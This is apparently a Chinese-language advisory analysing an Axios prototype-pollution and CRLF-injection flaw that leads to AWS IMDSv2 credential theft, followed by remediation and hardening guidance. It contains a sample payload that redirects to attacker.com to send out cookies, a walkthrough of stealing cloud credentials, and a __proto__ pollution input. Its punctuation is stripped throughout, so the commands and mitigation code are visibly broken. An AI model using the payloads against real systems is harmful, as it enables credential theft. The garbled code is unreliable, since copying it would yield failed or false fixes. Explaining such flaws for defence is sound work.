2026年4月9日全球最流行的JavaScript HTTP客户端Axios发布紧急安全更新修复了编号为CVE-2026-40175的高危漏洞。该漏洞CVSS评分高达9.9/10影响所有0.x和1.x版本周下载量超过1亿次的庞大用户群体瞬间暴露在风险之中。与此前的供应链投毒事件不同这是一次典型的Gadget攻击链漏洞——它将JavaScript生态中普遍存在的原型污染漏洞放大为可窃取云凭证、实现远程代码执行的致命武器。本文将从漏洞原理、攻击链、影响面、应急方案到行业未来安全趋势进行全面深度解析为开发者和企业提供完整的应对指南。引言当最信任的依赖变成最危险的后门在JavaScript的世界里Axios几乎是一个国民级的依赖。无论是前端应用、Node.js后端、SSR服务还是云原生函数只要需要发送HTTP请求十有八九都会引入Axios。npm官方数据显示截至2026年4月Axios的周下载量已突破1.2亿次被超过800万个公开仓库依赖间接影响的应用数量更是数以千万计。正是这种无处不在的普及性让CVE-2026-40175成为了2026年开年以来最具破坏力的安全漏洞之一。更令人担忧的是这不是一个孤立的代码缺陷而是整个JavaScript生态系统性风险的集中爆发。它向整个行业敲响了警钟我们每天都在使用的基础依赖可能早已成为攻击者手中的生态核弹只需要一个小小的原型污染火花就能引发全行业的安全灾难。一、漏洞全景不是独立RCE而是全生态的原型污染放大器1.1 先澄清与3月供应链投毒事件的本质区别在深入分析漏洞之前我们必须首先明确一个极易混淆的事实CVE-2026-40175与2026年3月31日发生的Axios供应链投毒事件是两个完全独立的安全事件二者没有任何关联。事件时间影响版本漏洞类型攻击方式供应链投毒事件2026-03-311.14.1、0.30.4恶意代码注入攻击者劫持npm账号发布恶意版本CVE-2026-401752026-04-090.1.0 1.15.0原型污染利用链利用合法版本中的设计缺陷前者是典型的供应链攻击只有少数不幸下载了特定恶意版本的用户受到影响而后者则是存在于Axios所有历史版本中的设计缺陷所有使用Axios的项目都存在潜在风险这也是为什么这次漏洞的影响面要大得多的原因。1.2 漏洞原理深度拆解从原型污染到云凭证窃取的完整攻击链CVE-2026-40175本质上是一个**“原型污染Gadget漏洞**它本身不能直接导致远程代码执行但它为所有原型污染漏洞提供了一个威力巨大的放大器”将原本可能只能导致拒绝服务的漏洞升级为可窃取云凭证、甚至实现远程代码执行的致命攻击。完整的攻击链分为四个阶段阶段1原型污染注入前置条件攻击者首先需要利用应用中任何其他依赖的原型污染漏洞。在JavaScript生态中原型污染漏洞极为普遍几乎所有处理对象合并、JSON解析、查询字符串解析的库都曾出现过此类漏洞包括但不限于qs最常用的查询字符串解析库多次出现原型污染漏洞lodash最流行的工具库CVE-2020-8203等多个漏洞minimist命令行参数解析库iniINI文件解析库body-parserExpress默认的请求体解析中间件即使你的代码本身没有任何漏洞只要你的依赖链中存在任何一个未修复的原型污染漏洞攻击者就可以通过精心构造的请求向Object.prototype注入任意属性。阶段2Axios配置合并读取原型属性Axios的核心设计之一是支持多层级的配置合并默认配置 → 实例配置 → 请求配置。在合并过程中Axios会递归地将上层配置与下层配置合并。问题出在Axios的合并逻辑没有使用安全的方式读取对象属性。当合并headers配置时Axios会遍历Object.prototype上的所有属性并将其作为HTTP头添加到请求中。这意味着如果攻击者通过原型污染在Object.prototype上注入了一个名为X-Malicious-Header的属性那么所有后续的Axios请求都会自动带上这个恶意头。阶段3CRLF注入实现HTTP响应拆分更致命的是Axios在处理HTTP头时没有正确过滤CRLF回车换行字符CWE-113。攻击者可以在注入的头值中插入\r\n字符从而拆分HTTP响应注入任意的HTTP头和响应体。例如攻击者可以注入这样一个恶意属性Object.prototype[X-Attacker-Header]\r\nLocation: https://attacker.com/steal?datadocument.cookie;这会导致Axios发送的HTTP请求变成GET /api/data HTTP/1.1 Host: example.com X-Attacker-Header: Location: https://attacker.com/steal?dataabc123在某些场景下这可以实现HTTP响应拆分攻击窃取用户的Cookie、会话令牌等敏感信息。阶段4绕过IMDSv2防护窃取云凭证这是本次漏洞最危险的部分。攻击者可以利用CRLF注入构造特殊的HTTP请求绕过AWS IMDSv2的防护机制直接访问云服务器的元数据服务窃取临时访问凭证。IMDSv2原本是AWS为了防止SSRF攻击而设计的安全机制它要求所有请求必须先获取一个会话令牌。但通过Axios的CRLF注入漏洞攻击者可以在同一个TCP连接中发送两个HTTP请求第一个请求获取IMDSv2令牌第二个请求使用这个令牌获取云凭证。一旦攻击者获得了云服务器的临时访问凭证他们就可以访问该服务器关联的所有云资源包括S3存储桶、RDS数据库、ECS容器等从而导致整个云账号失陷。在某些特定场景下例如服务器具有执行命令的权限攻击者还可以进一步升级为远程代码执行完全控制服务器。1.3 为什么这次危害远超以往所有Axios漏洞CVE-2026-40175的危害之所以远超以往所有Axios漏洞主要有三个原因影响范围空前所有0.x和1.x版本都受影响覆盖了Axios发布以来的全部历史版本。利用门槛极低攻击者不需要控制Axios本身只需要利用任何一个其他依赖的原型污染漏洞即可。攻击后果严重直接指向云凭证窃取这是云环境下最致命的攻击后果之一。更可怕的是这种攻击模式具有极强的隐蔽性。原型污染漏洞通常很难被发现而Axios的配置合并逻辑又隐藏在依赖深处即使你的代码没有任何问题也可能在不知不觉中被攻击。二、影响面评估谁在裸泳2.1 技术栈影响范围从前端到后端的全面沦陷CVE-2026-40175影响所有使用Axios的JavaScript应用包括但不限于Node.js后端服务这是风险最高的场景。Node.js服务通常运行在云服务器上具有访问云资源的权限一旦被攻击直接导致云凭证泄露。SSR服务端渲染应用Next.js、Nuxt.js等SSR框架同时运行在服务端和客户端服务端的Axios请求可以直接访问云元数据服务。BFFBackend For Frontend层BFF层通常作为前端和后端之间的代理会转发大量的用户请求极易成为原型污染的入口。前端单页应用虽然前端应用无法直接访问云元数据服务但仍然可能受到HTTP响应拆分攻击导致用户信息泄露。云原生函数AWS Lambda、Azure Functions、Google Cloud Functions等无服务器函数通常使用Axios发送HTTP请求并且具有很高的IAM权限。桌面应用基于Electron开发的桌面应用如果使用Axios发送请求也可能受到攻击。2.2 行业风险分级根据我们的评估以下行业的企业面临的风险最高云服务提供商和SaaS企业这些企业的核心业务都运行在云上一旦云凭证泄露可能导致数百万用户的数据被窃取。金融科技和支付行业处理大量敏感的金融数据攻击后果不堪设想。电商和零售行业拥有大量用户的个人信息和支付数据是攻击者的重点目标。政府和公共事业涉及国家机密和公共安全一旦被攻击可能造成严重的社会影响。游戏行业拥有大量用户的账号和虚拟资产容易成为攻击者的目标。2.3 真实攻击场景推演攻击者如何在3分钟内拿下你的云服务器为了让大家更直观地理解这个漏洞的危害我们来推演一个真实的攻击场景攻击者发现目标攻击者通过搜索引擎发现一个使用Express.js和Axios开发的Node.js服务该服务使用了存在原型污染漏洞的qs库版本6.7.0。注入原型污染攻击者发送一个精心构造的GET请求通过qs库的原型污染漏洞向Object.prototype注入恶意HTTP头。触发Axios漏洞该服务在处理完用户请求后会使用Axios向内部的另一个服务发送请求。Axios在合并配置时自动将攻击者注入的恶意头添加到请求中。窃取云凭证恶意头中包含CRLF字符构造了两个HTTP请求。第一个请求向AWS IMDSv2服务获取会话令牌第二个请求使用该令牌获取临时访问凭证。控制云资源攻击者获得临时访问凭证后使用AWS CLI访问该服务器关联的S3存储桶下载了所有用户数据。权限提升攻击者发现该服务器的IAM角色具有EC2管理员权限于是创建了一个新的EC2实例作为后门长期控制整个云账号。整个攻击过程不超过3分钟而且几乎不会留下任何明显的痕迹。如果企业没有专门的云安全监控可能在数周甚至数月后才会发现数据泄露。三、全流程应急处置指南从紧急补丁到深度加固面对如此严重的漏洞企业需要立即采取行动按照以下步骤进行应急处置3.1 第一步立即升级Axios处理间接依赖陷阱最根本的解决方案是将Axios升级到1.15.0或更高版本。Axios 1.15.0修复了两个核心问题在合并配置时不再读取Object.prototype上的属性对HTTP头中的CRLF字符进行了严格的过滤升级命令# npmnpminstallaxioslatest--save# yarnyarnupgrade axioslatest# pnpmpnpmupdate axioslatest特别注意间接依赖问题很多时候Axios并不是你直接引入的而是被其他依赖间接引入的。你需要使用以下命令检查项目中所有的Axios版本npmlsaxios如果发现有受影响的版本被间接引入你可以使用resolutions字段强制升级到安全版本在package.json中添加{resolutions:{axios:^1.15.0}}然后重新安装依赖rm-rfnode_modules package-lock.jsonnpminstall3.2 第二步全链路原型污染漏洞排查升级Axios只是解决了放大器的问题并没有解决根源的原型污染漏洞。你需要对整个依赖链进行全面排查找出并修复所有潜在的原型污染漏洞。推荐使用以下工具进行排查npm auditnpm内置的安全审计工具可以检测已知的漏洞snyk专业的依赖安全扫描工具支持检测原型污染漏洞socket.dev新一代的供应链安全工具可以检测未知的原型污染风险eslint-plugin-no-unsanitizedESLint插件可以检测代码中不安全的对象合并操作排查命令示例# 使用npm auditnpmaudit# 使用snyknpminstall-gsnyk snyktest# 使用socketnpx socketsecurity/cli scan对于发现的原型污染漏洞优先升级到安全版本。如果无法升级需要添加临时的防护代码。3.3 第三步无法升级时的临时缓解方案如果因为某些原因无法立即升级Axios可以采取以下临时缓解方案方案1全局覆盖Axios的默认配置在应用启动时显式指定Axios的默认headers避免使用原型继承constaxiosrequire(axios);// 覆盖默认配置使用Object.create(null)创建无原型的对象axios.defaults.headersObject.create(null);axios.defaults.headers.commonObject.create(null);axios.defaults.headers.getObject.create(null);axios.defaults.headers.postObject.create(null);axios.defaults.headers.putObject.create(null);axios.defaults.headers.deleteObject.create(null);方案2添加请求拦截器过滤恶意头添加一个全局请求拦截器在发送请求前过滤所有来自原型的头axios.interceptors.request.use(config{// 创建一个新的headers对象只复制自身属性constsafeHeadersObject.create(null);constheadersconfig.headers||{};for(constkeyinheaders){if(Object.prototype.hasOwnProperty.call(headers,key)){// 过滤CRLF字符constvalueString(headers[key]).replace(/[\r\n]/g,);safeHeaders[key]value;}}config.headerssafeHeaders;returnconfig;});方案3冻结Object.prototype在应用启动时冻结Object.prototype防止原型污染Object.freeze(Object.prototype);注意这个方案可能会导致某些依赖库无法正常工作需要充分测试后再使用。3.4 第四步云环境专项加固切断最致命的攻击路径云环境是本次漏洞最危险的攻击目标企业需要立即采取以下专项加固措施AWS云环境加固强制启用IMDSv2禁用IMDSv1只允许使用IMDSv2aws ec2 modify-instance-metadata-options\--instance-id i-1234567890abcdef0\--http-endpoint enabled\--http-tokens required\--http-put-response-hop-limit1限制IMDSv2的访问权限使用安全组阻止非本地进程访问IMDSv2服务169.254.169.254遵循最小权限原则为每个EC2实例分配最小权限的IAM角色不要使用管理员权限启用云监控监控异常的IMDSv2请求特别是短时间内大量的PUT和GET请求Azure云环境加固禁用IMDSv1只允许使用IMDSv2限制IMDS的访问权限使用网络安全组阻止非本地进程访问IMDS服务169.254.169.254启用Azure Defender for Cloud检测异常的IMDS请求和可疑的活动GCP云环境加固禁用旧版元数据服务只允许使用v1版本的元数据服务启用元数据服务防护设置metadata-flagsv1,disable-legacy-endpoints遵循最小权限原则为每个VM实例分配最小权限的服务账号四、行业反思为什么JS生态总是在原型污染上栽跟头CVE-2026-40175不是第一个原型污染漏洞也绝对不会是最后一个。过去十年间JavaScript生态已经爆发了数百个原型污染漏洞其中不乏lodash、underscore、qs这样的基础库。为什么原型污染问题在JavaScript生态中如此顽固4.1 语言设计的原罪原型链的双刃剑原型污染问题的根源在于JavaScript的原型链设计。在JavaScript中所有对象都继承自Object.prototype如果攻击者能够修改Object.prototype那么所有对象都会受到影响。这种设计在早期为JavaScript带来了极大的灵活性但也埋下了巨大的安全隐患。与Java、C#等面向对象语言不同JavaScript没有类的概念对象的属性是动态添加的这使得原型污染成为可能。虽然TC39一直在努力改进这个问题比如引入了Object.create(null)创建无原型的对象以及Object.freeze()冻结对象但这些都是事后的补救措施无法从根本上解决原型链的设计缺陷。4.2 库开发的陋习不安全的对象合并无处不在原型污染漏洞的另一个重要原因是库开发中的陋习不安全的对象合并操作。几乎所有的JavaScript库都需要实现对象合并功能但大多数开发者在实现时都没有考虑到原型污染的风险。一个典型的不安全对象合并实现functionmerge(target,source){for(constkeyinsource){if(typeofsource[key]objectsource[key]!null){target[key]merge(target[key]||{},source[key]);}else{target[key]source[key];}}returntarget;}这个实现没有检查key是否是__proto__、constructor或prototype攻击者可以通过传入{__proto__: {evil: true}}来污染原型。更令人担忧的是即使是经验丰富的开发者也容易犯这个错误。很多知名的库都曾因为不安全的对象合并而出现原型污染漏洞。4.3 依赖管理的困境我们到底引入了多少未知风险现代JavaScript应用的依赖树越来越复杂一个简单的应用可能会引入数百个间接依赖。我们根本无法审查所有依赖的代码只能信任它们是安全的。但事实证明这种信任是脆弱的。很多基础库的维护者都是志愿者他们没有足够的时间和精力进行安全审计。一个小小的代码缺陷就可能通过依赖链传播到数百万个应用中。CVE-2026-40175就是一个典型的例子。Axios的漏洞已经存在了多年但直到最近才被发现。在这期间它已经被数十亿次下载成为了整个生态的定时炸弹。五、前瞻构建下一代JS应用安全防御体系面对日益严峻的JavaScript安全形势我们需要从根本上改变我们的安全理念构建下一代JS应用安全防御体系。5.1 代码层面从源头杜绝原型污染在代码层面我们需要养成良好的编程习惯从源头杜绝原型污染使用无原型对象对于存储用户输入的对象使用Object.create(null)创建避免原型继承使用安全的对象合并方法使用经过安全审计的对象合并库如lodash.merge的最新版本或者使用ES6的扩展运算符...验证所有用户输入对所有用户输入进行严格的验证和过滤特别是对象的键名冻结原型对象在应用启动时冻结Object.prototype、Array.prototype等内置原型对象5.2 工具链层面左移安全在开发阶段拦截风险安全应该左移到开发阶段通过工具链自动拦截风险使用ESLint安全插件安装eslint-plugin-security、eslint-plugin-no-unsanitized等插件在编码阶段检测不安全的代码集成依赖安全扫描在CI/CD流水线中集成npm audit、snyk、socket.dev等工具自动检测依赖中的漏洞使用TypeScript严格模式TypeScript的严格模式可以在编译阶段发现很多潜在的问题包括原型污染风险启用代码扫描使用SonarQube、CodeQL等静态代码分析工具定期扫描代码中的安全漏洞5.3 运行时层面建立纵深防御体系即使我们在代码和工具链层面做了充分的防护也不能保证绝对安全。我们需要在运行时建立纵深防御体系使用安全的运行时考虑使用Deno、Bun等新一代JavaScript运行时它们在设计时就考虑了安全问题启用运行时防护使用lavamoat、ses等工具为依赖创建沙箱环境限制它们的权限实施网络隔离将应用部署在隔离的网络环境中限制不必要的网络访问加强监控和日志建立完善的监控和日志体系及时发现和响应安全事件5.4 企业层面构建全生命周期的供应链安全能力对于企业来说安全不是一次性的补丁而是一个持续的过程。企业需要构建全生命周期的供应链安全能力建立依赖准入制度对引入的第三方依赖进行严格的安全评估只使用经过验证的依赖定期进行安全审计定期对代码和依赖进行全面的安全审计发现潜在的风险制定应急响应预案制定完善的安全事件应急响应预案定期进行演练加强员工安全培训提高员工的安全意识让安全成为每个人的责任六、结论安全没有银弹只有持续警惕CVE-2026-40175是JavaScript生态发展过程中的一个重要里程碑。它向我们展示了基础依赖漏洞的巨大破坏力也暴露了整个生态在安全方面的不足。升级Axios只是解决了眼前的问题但原型污染的根源依然存在未来还会有更多类似的漏洞出现。我们不能指望依靠补丁来解决所有安全问题必须从根本上改变我们的安全理念将安全融入到软件开发的每一个环节。作为开发者我们需要对我们引入的每一个依赖保持警惕对我们编写的每一行代码负责。作为企业我们需要建立完善的安全体系培养安全文化将安全作为企业的核心竞争力。安全没有银弹只有持续警惕。只有这样我们才能在日益复杂的网络环境中保护好我们的应用和用户的数据。